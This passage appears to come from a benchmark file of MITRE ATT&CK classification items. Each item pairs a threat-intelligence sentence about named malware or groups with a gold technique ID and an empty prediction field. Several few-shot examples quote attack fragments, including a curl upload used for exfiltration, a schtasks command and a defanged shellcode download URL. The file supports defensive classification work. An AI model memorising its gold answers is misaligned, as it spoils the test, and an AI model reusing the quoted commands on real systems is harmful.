"- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ke3chang has developed custom malware that allowed them to maintain persistence on victim networks.\n\t - T1587.001: Develop Capabilities - Malware\n- Text: A Python script was created for the purpose of automating this configuration file decoding process. The output of this script when run against the configuration file used by the first of the two Parliamentarian operation samples yielded the following data\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: Kimsuky has created social media accounts to monitor news and security trends as well as potential targets.\n\t - T1585.001: Establish Accounts - Social Media Accounts\n", + "input": "Kimsuky has developed its own unique malware such as MailFetch.py for use in operations.", + "gold": "- T1587.001: Develop Capabilities - Malware", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TrickBot sends the reconnaissance information from the target machine to a hardcoded C2 server. The C2 server is responsible for handling the stolen data\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Smoke Loader uses HTTP for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: CookieMiner has used the \"curl --upload-file\" command to exfiltrate data over HTTP.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "Squirrelwaffle has exfiltrated victim data using HTTP POST requests to its C2 servers.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sandworm Team has sent system information to its C2 server using HTTP.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Patchwork collected and exfiltrated files from the infected system.\n\t - T1005: Data from Local System\n- Text: A Helminth VBScript receives a batch script to execute a set of commands in a command prompt.\n\t - T1119: Automated Collection\n", + "input": "PowerShower has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Persistence is maintained through a Run registry key\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: The LNK file is moved to the startup directory\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: Green Lambert can add \"init.d\" and \"rc.d\" files in the \"/etc\" folder to establish persistence.\n\t - T1037.004: Boot or Logon Initialization Scripts - RC Scripts\n", + "input": "BadPatch establishes a foothold by adding a link to the malware executable in the startup folder.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: specifically looks for Domain Admins, Power Users, and the Administrators groups within the domain and locally\n\t - T1069: Permission Groups Discovery\n- Text: Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point\n\t - T1609: Container Administration Command\n- Text: TeamTNT has deployed different types of containers into victim environments to facilitate execution. TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges.\n\t - T1610: Deploy Container\n", + "input": "Siloscape checks for Kubernetes node permissions.", + "gold": "- T1069: Permission Groups Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.\n\t - T1012: Query Registry\n- Text: Valak has the ability to modify the Registry key \"HKCU\\Software\\ApplicationContainer\\Appsw64\" to store information regarding the C2 server and downloads.\n\t - T1112: Modify Registry\n- Text: Several backdoors achieved persistence by adding a Run key.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", + "input": "BitPaymer can use the RegEnumKeyW to iterate through Registry keys.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1556.006\n- Text: AADInternals can register a device to Azure AD.\n\t - T1098.005: Account Manipulation - Device Registration\n- Text: AADInternals can enumerate Azure AD users.\n\t - T1087.004: Account Discovery - Cloud Account\n", + "input": "The AADInternals `Set-AADIntUserMFA` command can be used to disable MFA for a specified user.", + "gold": "- T1556.006: Modify Authentication Process - Multi-Factor Authentication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: While investigating these files, we observed what we believe was active development on these .cmd files that helps illuminate the Gamaredon group\u2019s processes\n\t - T1057: Process Discovery\n- Text: has used sc query on a victim to gather information about services.\n\t - T1007: System Service Discovery\n- Text: Hard Disk Check The Trojan will perform the following WMI query: Select * from Win32_DiskDrive The Trojan will check the Caption and Model fields in the results for the strings Virtual, VMWare, VM, VBox or Oracle\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n\t - T1497: Virtualization/Sandbox Evasion\n", + "input": "GravityRAT lists the running processes on the system.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: XCSSET has dropped a malicious applet into an app's `.../Contents/MacOS/` folder of a previously launched app to bypass Gatekeeper's security checks on first launch apps (prior to macOS 13).\n\t - T1553.001: Subvert Trust Controls - Gatekeeper Bypass\n- Text: As has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the most attention contains the malware payload in the application bundle\u2019s Resources folder. The file is a Mach-O binary disguised as a .nib file, at ../Resources/Base.lproj/Submenu.nib. This file is copied directly to the users Library folder and renamed as .mina. The dot prefix is added in order to make it invisible in the Finder\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n- Text: No matching sample found for T1548.001\n", + "input": "CoinTicker downloads the EggShell mach-o binary using curl, which does not set the quarantine flag.", + "gold": "- T1553.001: Subvert Trust Controls - Gatekeeper Bypass", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This is performed by checking if the following libraries are loaded on the victim machine.SbieDll.dll (sandboxie library)Dbghelp.dll (Microsoft debugging tools)Api_log.dll (threatAnalyzer / GFI SandBox)Dir_watch.dll (threatAnalyzer / GFI SandBox)We were able to uncover some other techniques used by this variant of ROKRAT to make analysis difficult, Group 123 used an anti-debugging technique related to NOP (No Operation).nop dword ptr [eax+eax+00h] is a 5 byte NOP\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: At this time, Janicab is not detected by most anti-virus software, and it slips right past the built-in defenses of Mac OS X in the hands of an unobservant or unsavvy user. Further, seeing other malware using a signed app is troubling, as it may indicate that Gatekeeper will not offer as much security as had been hoped for\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Command_Keylog_offline: Load into memory a dll that contains the function \u201cPluginMe\u201d. After researching and analyzing additional Gh0stRAT samples while trying to figure out what dll contains \u201cPluginMe\u201d, I found a DLL for keylogging (called Keylog.dll) in a Gh0stRAT 2.0 sample that exported \u201cPluginMe\u201d. Using that and a cross-comparison of another Gh0stRAT sample that I\u2019ve previously analyzed, I was able to determine that \u201cPluginMe\u201d is a offline keyboard manager\n\t - T1055: Process Injection\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n\t - T1056: Input Capture\n", + "input": "Chinoxy can use a digitally signed binary (\"Logitech Bluetooth Wizard Host Process\") to load its dll into memory.", + "gold": "- T1574.002: Hijack Execution Flow - DLL Side-Loading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: obtains a list of running processes on the victim.\n\t - T1057: Process Discovery\n- Text: has commands to get the current user's name and SID.\n\t - T1033: System Owner/User Discovery\n- Text: T9000 performs checks for various antivirus and security products during installation.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "Cyclops Blink can enumerate the process it is currently running under.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has a module for performing remote desktop access.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: After deobfuscation you can see \u201cImminent Monitor\u201d string which may indicate it is related to Imminent Monitor RAT\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1123: Audio Capture\n\t - T1125: Video Capture\n- Text: Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. The adversary typically uses PS to run Cobalt Strike but occasionally writes Cobalt Strike stagers or KillACK backdoors to disk. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts\n\t - T1021.005: Remote Services - VNC\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1021.004: Remote Services - SSH\n", + "input": "Imminent Monitor has a module for performing remote desktop access.", + "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.\n\t - T1113: Screen Capture\n- Text: High resolution screenshots of specified process windows and when recording VoiceIP application audio\n\t - T1123: Audio Capture\n- Text: Kazuar captures images from the webcam.\n\t - T1125: Video Capture\n", + "input": "CharmPower has the ability to capture screenshots.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This is the only instance we observed where a hardcoded Google Drive URL was included in RogueRobin, which may suggest that the author may have overlooked this during testing\n\t - T1083: File and Directory Discovery\n- Text: QuietSieve can identify and search networked drives for specific file name extensions.\n\t - T1135: Network Share Discovery\n- Text: We also identified a Tomiris variant (internally named \u201cSBZ\u201d, MD5 51AA89452A9E57F646AB64BE6217788E) which acts as a filestealer, and uploads any recent file matching a hardcoded set of extensions (.doc, .docx, .pdf, .rar, etc\n\t - T1005: Data from Local System\n", + "input": "GrimAgent has the ability to enumerate files and directories on a compromised host.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. At the time of writing, tmate sessions are the only way the attacker interacts with the compromised containers\n\t - T1219: Remote Access Software\n\t - T1219: Remote Access Software\n- Text: Gamaredon Group has used VNC tools, including UltraVNC, to remotely interact with compromised hosts.\n\t - T1021.005: Remote Services - VNC\n- Text: The screenshots included remote desktop (RDP) sessions showing the Glimpse panel, a web browser session displaying a C2 panel called Scarecrow, web browser sessions into VPS administrative panels, and evidence of potential destructive attacks against OilRig servers\n\t - T1113: Screen Capture\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1505.003: Server Software Component - Web Shell\n", + "input": "TrickBot uses vncDll module to remote control the victim machine.", + "gold": "- T1219: Remote Access Software", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZIRCONIUM has created a run key named \"Dropbox Update Setup\" to mask a persistence mechanism for a malicious binary.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Lokibot embedded the commands \"schtasks /Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I\" inside a batch script.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "Lazarus Group has used a scheduled task named `SRCheck` to mask the execution of a malicious .dll.", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CharmPower can list the installed applications on a compromised host.\n\t - T1518: Software Discovery\n- Text: Since this malicious extension is trying to pass for a legitimate Chrome plugin, Grandoreiro\u2019s developer named it \u201cGoogle Plugin\u201d version 1.5.0. Visually, it adds a square button to the browser window instead of the \u201ccookie\u201d button on the original plugin\n\t - T1176: Browser Extensions\n- Text: The checks are done in an obfuscated way within the jumble of the code that the malware has (in the virtual machine used here the Spanish language of Spain (es-ES) was used; it is the code 0xC0A that appears in the stack in the screenshot\n\t - T1082: System Information Discovery\n", + "input": "Bundlore has the ability to enumerate what browser is being used as well as version information for Safari.", + "gold": "- T1518: Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Smoke Loader deobfuscates its code.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Next, to the beginning of the BASE64 string a random BASE64 string with the length of 5 characters is added\n\t - T1027: Obfuscated Files or Information\n- Text: Invoke-PSImage can be used to embed payload data within a new image file.\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n", + "input": "BOOSTWRITE has used a a 32-byte long multi-XOR key to decode data inside its payload.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DropBook has checked for the presence of Arabic language in the infected machine's settings.\n\t - T1082: System Information Discovery\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: QakBot can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Exfiltration over control server channel: data is exfiltrated over the control server channel using a custom protocol - Commonly used port: the attackers used common ports such as port 443 for control server communications - Service execution: registers the implant as a service on the victim\u2019s machine - Automated collection: the implant automatically collects data about the victim and sends it to the control server - Data from local system: local system is discovered and data is gathered - Process discovery: implants can list processes running on the system - System time discovery: part of the data reconnaissance method, the system time is also sent to the control server - File deletion:: malware can wipe files indicated by the attacker\n\t - T1124: System Time Discovery\n\t - T1119: Automated Collection\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "MarkiRAT can use the \"GetKeyboardLayout\" API to check if a compromised host's keyboard is set to Persian.", + "gold": "- T1614.001: System Location Discovery - System Language Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files: NOP sled composed of 0x90 and 0x91 opcodes The main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf\n\t - T1064: Scripting\n\t - T1027: Obfuscated Files or Information\n\t - T1105: Ingress Tool Transfer\n- Text: The following code example shows the false flag being set (5 > 115) and the ETransaksi.diomadnfagaghagh method being called: int num = 5; int num2 = 155; bool flag = num > num2; if (flag) { } else { NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, \"Invoke\", new object[] { null, new object[0] }, null, null, null, true);The payload uses this technique to run a chain of methods that eventually carry out its malicious task\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: AppleSeed has compressed collected data before exfiltration.\n\t - T1560: Archive Collected Data\n", + "input": "Stuxnet uses encrypted configuration blocks and writes encrypted files to disk.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: jRAT can list security software, such as by using WMIC to identify anti-virus products installed on the victim\u2019s machine and to obtain firewall details.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: APT39 has used malware to turn off the \"RequireSigned\" feature which ensures only signed DLLs can be run on Windows.\n\t - T1553.006: Subvert Trust Controls - Code Signing Policy Modification\n- Text: Operation Wocao has queried the registry to detect recent PuTTY sessions.\n\t - T1012: Query Registry\n", + "input": "XCSSET searches firewall configuration files located in \"/Library/Preferences/\" and uses \"csrutil status\" to determine if System Integrity Protection is enabled.", + "gold": "- T1518.001: Software Discovery - Security Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: used Base64 to encode C2 traffic.\n\t - T1132: Data Encoding\n- Text: The Trojan will convert these hexadecimal bytes to their binary values and write them to a file and will run the file using the \u201copen\u201d function using the ShellExecuteW API function\n\t - T1106: Native API\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Dragonfly 2.0 compressed data into .zip files prior to exfiltrating it.\n\t - T1560: Archive Collected Data\n", + "input": "Bundlore has obfuscated data with base64, AES, RC4, and bz2.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The exact date when the malware was compiled is unknown \u2013 the recent wrapper DLL samples were tampered with by the malware authors, with the PE timestamps manually set to zero values. However, during our research, we found an earlier version of the malware with a PE timestamp reading Oct 13, 2013, so the compilation date of the later version is almost surely more recent\n\t - T1070.006: Indicator Removal - Timestomp\n- Text: The implant has the capability of gathering data from the victim\u2019s system. The following information will be gathered and sent to the command and control server\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n", + "input": "USBStealer sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.", + "gold": "- T1070.006: Indicator Removal - Timestomp", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads. Versions of OSX/Shlayer pass encrypted and password-protected code to \"openssl\" and then write the payload to the \"/tmp\" folder.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: In some attacks, Whitefly has used a second piece of custom malware, Trojan.Nibatad. Like Vcrodat, Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer. And similar to Vcrodat, the Nibatad payload is designed to facilitate information theft from an infected computer\n\t - T1027: Obfuscated Files or Information\n- Text: Mis-Type uses Base64 encoding for C2 traffic.\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "Ke3chang has used Base64-encoded shellcode strings.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ChChes can encrypt C2 traffic with AES or RC4.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: GrimAgent can use a decryption algorithm for strings based on Rotate on Right (RoR) and Rotate on Left (RoL) functionality.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: The UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Torisma has encrypted its C2 communications using XOR and VEST-32.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BLINDINGCAN can search, read, write, move, and execute files.\n\t - T1083: File and Directory Discovery\n- Text: QakBot can enumerate a list of installed programs.\n\t - T1518: Software Discovery\n- Text: can gather network share information.\n\t - T1135: Network Share Discovery\n", + "input": "KGH_SPY can enumerate files and directories on a compromised host.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique 